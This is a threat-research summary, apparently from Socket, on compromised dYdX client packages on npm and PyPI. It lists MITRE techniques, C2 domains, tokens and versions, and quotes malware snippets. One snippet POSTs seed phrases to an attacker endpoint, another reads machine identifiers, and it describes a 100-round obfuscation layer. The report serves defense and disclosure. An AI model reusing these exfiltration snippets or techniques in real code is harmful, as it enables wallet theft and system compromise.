Threat Research

Malicious dYdX Packages Published to npm and PyPI After Main…

SocketDev
Malicious dYdX Packages Published to npm and PyPI After Main…

Socket Threat Research discovered a coordinated supply chain attack that published malicious versions of the dYdX client libraries to npm and PyPI, embedding wallet-stealing credential exfiltration and, in the PyPI release, a Remote Access Trojan (RAT). The malicious packages exfiltrated seed phrases and device fingerprints to a typosquatting domain and the PyPI release used a 100-iteration obfuscation to deploy a RAT capable of arbitrary code execution and persistent access. #dYdX #priceoracle.site

Keypoints

  • Socket flagged malicious behavior in compromised dYdX client packages on January 27, 2026, and notified dYdX on January 28, 2026.
  • Compromised packages: npm @dydxprotocol/v4-client-js (multiple malicious versions) and PyPI dydx-v4-client (v1.1.5post1).
  • npm payload: credential theft that exfiltrates seed phrases and device fingerprints; PyPI payload: same credential theft plus an obfuscated RAT enabling arbitrary code execution.
  • Exfiltration and C2 infrastructure used a typosquatting domain (dydx[.]priceoracle[.]site) with endpoints /v4/price for credentials and /py for RAT commands.
  • Malicious code was embedded into core package files (registry.ts/registry.js/account.py) and published using legitimate credentials, consistent with developer account compromise.
  • Impact ranges from complete wallet compromise for npm victims to full system compromise, persistent backdoors, and remote code execution for PyPI victims; device fingerprinting enables tracking and targeting.

MITRE Techniques

  • [T1195.002 ] Supply Chain Compromise – Malicious versions were published to package registries using legitimate publishing credentials, embedding malware inside core package files (‘Multiple malicious versions were published simultaneously to both ecosystems using legitimate publishing credentials’).
  • [T1059.006 ] Command and Scripting Interpreter: Python – The PyPI RAT executes arbitrary Python code received from the C2 server in subprocesses (‘The RAT allows threat actor to: Execute arbitrary Python code with user privileges’).
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Exfiltration and C2 use HTTPS endpoints to send stolen credentials and receive commands (‘await fetch(“https://dydx[.]priceoracle[.]site/v4/price”‘).
  • [T1027 ] Obfuscated Files or Information – The PyPI payload is obfuscated with 100 iterations of reverse, base64 decode, and zlib decompress before execution (‘Apply 100 deobfuscation iterations’).
  • [T1082 ] System Information Discovery – Malware collects system identifiers (MAC, hostname, OS, machine-id) to build a device fingerprint used to correlate victims (‘parts.push(getMacLikeUuidNode()); parts.push(os.hostname()); … parts.push(fs.readFileSync(“/etc/machine-id”, “utf8”).trim());’).
  • [T1041 ] Exfiltration Over C2 Channel – Credential theft routines POST seed phrases and fingerprints to the attacker-controlled endpoint for collection (‘await fetch(“https://dydx[.]priceoracle[.]site/v4/price”, { method: “POST”, body: JSON.stringify({ phrase, “api-key”: “dydx1gh6fj28w37rykqu6szgp9q0rzejslmj0umk55c”, uid }) })’).
  • [T1005 ] Data from Local System – The RAT and credential-theft code read local files and sensitive data (e.g., /etc/machine-id, SSH keys, source code) for exfiltration (‘parts.append(fs.readFileSync(“/etc/machine-id”, “utf8”).trim())’).

Indicators of Compromise

  • [Domain ] Malicious typosquatting infrastructure used for exfiltration and C2 – dydx[.]priceoracle[.]site (registered Jan 9, 2026), priceoracle[.]site.
  • [HTTP Endpoints ] Exfiltration and C2 paths – https://dydx[.]priceoracle[.]site/v4/price (credential exfiltration), https://dydx[.]priceoracle[.]site/py (RAT C2).
  • [Packages ] Malicious package names and ecosystems – npm: @dydxprotocol/v4-client-js, PyPI: dydx-v4-client.
  • [Package Versions ] Compromised releases – npm examples: v1.0.31, v1.15.2 (and additional malicious versions v1.22.1, v3.4.1), PyPI example: v1.1.5post1.
  • [Hardcoded Credentials ] Embedded keys and tokens used by malware – API key: dydx1gh6fj28w37rykqu6szgp9q0rzejslmj0umk55c; RAT auth token: 490CD9DAD3FAE1F59521C27A96B32F5D677DD41BF1F706A0BF85E69CA6EBFE75.
  • [File Names ] Malicious code locations within packages – registry.ts / registry.js (npm), account.py (PyPI), config.py and _bootstrap.py (PyPI RAT payload files).

Read more: https://socket.dev/blog/malicious-dydx-packages-published-to-npm-and-pypi